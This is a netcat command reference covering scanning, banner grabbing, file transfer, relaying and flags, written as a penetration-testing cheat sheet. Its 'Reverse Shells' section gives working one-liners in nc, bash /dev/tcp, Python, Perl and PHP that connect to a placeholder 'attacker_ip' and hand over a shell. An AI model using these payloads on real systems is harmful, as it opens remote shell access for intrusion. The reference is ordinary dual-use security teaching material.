# Netcat

Netcat (nc) is a versatile networking utility for reading and writing data across network connections. Use it for port scanning, banner grabbing, reverse shells, file transfer, and network debugging.
## Installation

### Linux/Ubuntu

```bash
# Install netcat
sudo apt update
sudo apt install netcat

# Or netcat-openbsd (more common)
sudo apt install netcat-openbsd

# Verify installation
nc -h
which nc
```

### macOS

```bash
# Homebrew
brew install netcat

# Via MacPorts
sudo port install netcat

# A version of nc already ships with most Mac systems
```

### Windows

```powershell
# Using Chocolatey
choco install netcat

# Or download from:
# https://eternallybored.org/misc/netcat/
```
## Basic Operations

### Connect to Remote Host

```bash
# Basic connection
nc example.com 80

# Connect with timeout (seconds)
nc -w 5 example.com 80

# Connect with specific source IP
nc -s 192.168.1.100 example.com 80

# Verbose mode
nc -v example.com 80
```

### Listen on Port

```bash
# Listen on port 1234
nc -l 1234

# Listen on a specific interface (netcat-openbsd: -l takes [address] port; -s is not accepted together with -l)
nc -l 192.168.1.100 1234

# Listen in verbose mode
nc -v -l 1234

# By default the listener accepts a single connection and then exits (see -k under Common Flags)
nc -l 1234
```
## Port Scanning

| Command | Description |
|---|---|
| `nc -zv example.com 22` | Scan single port |
| `nc -zv example.com 1-100` | Scan port range |
| `nc -zv -w 2 example.com 1-1000` | Scan with timeout |
| `nc -u -zv example.com 53` | UDP port scan |
## Banner Grabbing

```bash
# Grab HTTP banner (type the request, then press Enter on an empty line to send it)
nc example.com 80
GET / HTTP/1.1
Host: example.com

# Grab SSH banner (the server sends its version string as soon as you connect)
nc example.com 22

# Grab SMTP banner
nc example.com 25
QUIT

# Grab FTP banner
nc example.com 21
QUIT

# Save banner to file
nc -v example.com 80 < /dev/null 2>&1 | head -n 5 > banner.txt
```
## File Transfer

### Send File

```bash
# Sender: listen and send file
nc -l 1234 < file.txt

# Receiver: connect and receive
nc example.com 1234 > file.txt

# Alternative syntax
cat file.txt | nc -l 1234

# Send a directory tree as a tar stream (receiver runs: nc example.com 1234 | tar xzf -)
tar czf - /important/files | nc -l 1234
```

### Receive File

```bash
# Sender: connect and send
nc example.com 1234 < file.txt

# Or with pipe
cat file.txt | nc example.com 1234

# Send directory
tar czf - /path/to/dir | nc example.com 1234

# Receiver side
nc -l 1234 | tar xzf -
```
## Reverse Shells

### Basic Reverse Shell

```bash
# Attacker listener
nc -v -l 4444

# Victim connects back
nc attacker_ip 4444 -e /bin/bash
# or
nc attacker_ip 4444 -e /bin/sh

# Without -e flag (if disabled)
/bin/bash -i >& /dev/tcp/attacker_ip/4444 0>&1
```

### Advanced Reverse Shells

```bash
# Python reverse shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker_ip",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'

# Perl reverse shell
perl -e 'use Socket;$i="attacker_ip";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

# PHP reverse shell
php -r '$sock=fsockopen("attacker_ip",4444);exec("/bin/bash -i <&3 >&3 2>&3");'
```
## Chat & Communication

### Simple Chat

```bash
# Terminal 1: listen
nc -l 5555

# Terminal 2: connect
nc localhost 5555

# Type messages in either terminal
```

### Multiple Connections

```bash
# Accept multiple connections, one after another
nc -l 5555 -k

# Or use -L (uppercase, "listen harder") on builds that lack -k, such as the Windows port
nc -L 5555
```
## UDP Operations

### UDP Communication

```bash
# UDP listen
nc -u -l 1234

# UDP send
nc -u example.com 1234

# UDP with specific source port
nc -u -p 5555 example.com 1234

# UDP verbose
nc -u -v example.com 53
```
## Advanced Techniques

### HTTP Request/Response

```bash
# Send HTTP GET request (the header block ends with an empty CRLF line)
(echo -e "GET / HTTP/1.1\r\nHost: example.com\r\nConnection: close\r\n\r\n"; sleep 1) | nc example.com 80

# Send POST request (Content-Length must equal the body's byte count: "key=value" is 9 bytes)
(echo -ne "POST /api HTTP/1.1\r\nHost: example.com\r\nContent-Length: 9\r\n\r\nkey=value"; sleep 1) | nc example.com 80

# Extract headers only
nc example.com 80 < request.txt | head -20
```
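A hand-written request only works when every line ends in CRLF and Content-Length matches the body exactly; a wrong length makes the server wait for bytes that never arrive or cut the body short. The helper below is an added example, not part of the original cheat sheet, and builds such a request from its arguments so it can be piped straight into nc:

```shell
#!/bin/bash
# Build a raw HTTP/1.1 request for nc. Every header line ends in CRLF and
# Content-Length is computed from the body's byte count, so the length can
# never drift out of sync with the body the way a hand-typed value can.
# Usage: build_http_request POST /api example.com 'key=value' | nc example.com 80
build_http_request() {
    local method=$1 path=$2 host=$3 body=${4-} len
    printf '%s %s HTTP/1.1\r\n' "$method" "$path"
    printf 'Host: %s\r\n' "$host"
    printf 'Connection: close\r\n'
    if [ -n "$body" ]; then
        # wc -c counts bytes, which is what Content-Length must state
        len=$(printf '%s' "$body" | wc -c | tr -d ' ')
        printf 'Content-Type: application/x-www-form-urlencoded\r\n'
        printf 'Content-Length: %s\r\n' "$len"
    fi
    printf '\r\n'          # empty line terminates the header block
    printf '%s' "$body"    # no trailing newline: it would not be counted
}

# Print the Content-Length the request carries (empty for a bodyless request)
content_length_of() {
    build_http_request "$@" | tr -d '\r' | sed -n 's/^Content-Length: //p'
}

# Number of CRLF-terminated lines in the head (request line + headers + blank line)
crlf_count_of() {
    build_http_request "$@" | tr -cd '\r' | wc -c | tr -d ' '
}
```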
### Proxy/Relaying

```bash
# One-way relay: data arriving on port 8888 is forwarded to remote:80 (replies are not sent back to the client)
(while true; do nc -l 8888; done) | nc example.com 80

# Use mkfifo for a two-way relay
mkfifo fifo
nc -l 1234 < fifo | nc example.com 80 > fifo
rm fifo
```

### Hex Dump

```bash
# Show traffic in hex
nc -v example.com 80 | od -c

# More detailed hex
nc -v example.com 80 | xxd
```
## Practical Examples

### Port Scanning Script

```bash
#!/bin/bash
# Simple port scanner using netcat (-z: no I/O, -w: per-port timeout in seconds)
# Usage: ./scan.sh <host> [start_port] [end_port]
host=$1
start_port=${2:-1}
end_port=${3:-65535}
for port in $(seq "$start_port" "$end_port"); do
    nc -z -w 1 "$host" "$port" 2>/dev/null && echo "Port $port: OPEN"
done
```

### Reverse Shell Listener

```bash
#!/bin/bash
# Reverse shell handler: waits for a single connection on $PORT
PORT=4444
nc -v -l "$PORT"
```

### Network Monitor

```bash
#!/bin/bash
# Connection monitor: listen on all IPv4 interfaces and print whatever arrives.
# nc cannot capture packets on an interface; use tcpdump for that.
port=${1:-9999}
nc -k -n -v -l 0.0.0.0 "$port"
```

### File Transfer Script

```bash
#!/bin/bash
# File transfer over nc (plaintext: no encryption and no integrity check)
# Usage: ./transfer.sh send <path> <host> <port>  |  ./transfer.sh receive <port>
if [ "$1" = "send" ]; then
    tar czf - "$2" | nc "$3" "$4"
elif [ "$1" = "receive" ]; then
    nc -l "$2" | tar xzf -
fi
```
## Common Flags

| Flag | Description |
|---|---|
| `-l` | Listen mode (server) |
| `-p <port>` | Specify source port |
| `-s <ip>` | Specify source IP |
| `-u` | UDP mode (default is TCP) |
| `-v` | Verbose output |
| `-w <timeout>` | Connection timeout (seconds) |
| `-z` | Zero-I/O mode (scanning) |
| `-e <program>` | Execute program on connection (nc.traditional and ncat; not available in netcat-openbsd) |
| `-k` | Keep listening after disconnect |
| `-n` | No DNS lookups |
| `-4` | IPv4 only |
| `-6` | IPv6 only |
## Troubleshooting

### Common Issues

#### Connection Refused

```bash
# Check if port is actually open
nc -zv -w 2 host port

# Check listening ports
netstat -tlnp
```

#### Timeout Issues

```bash
# Increase timeout
nc -w 10 host port

# Debug with verbose
nc -vv host port
```

#### No Response from Reverse Shell

```bash
# Check listener is active
nc -v -l 4444

# Check victim connectivity
nc -zv attacker_ip 4444
```
## Security Notes

- Netcat transmits data in plaintext
- Use for authorized testing only
- Consider using encrypted alternatives (SSH, OpenSSL)
- Monitor netcat processes: `ps aux | grep nc`
- Firewall nc listeners appropriately
- Document all security testing
- Use on authorized networks only
## Alternatives

- socat: more powerful socket relay
- ncat: improved netcat with encryption (TLS)
- netcat6: IPv6 support
- cryptcat: encrypted netcat

Last updated: 2025-03-30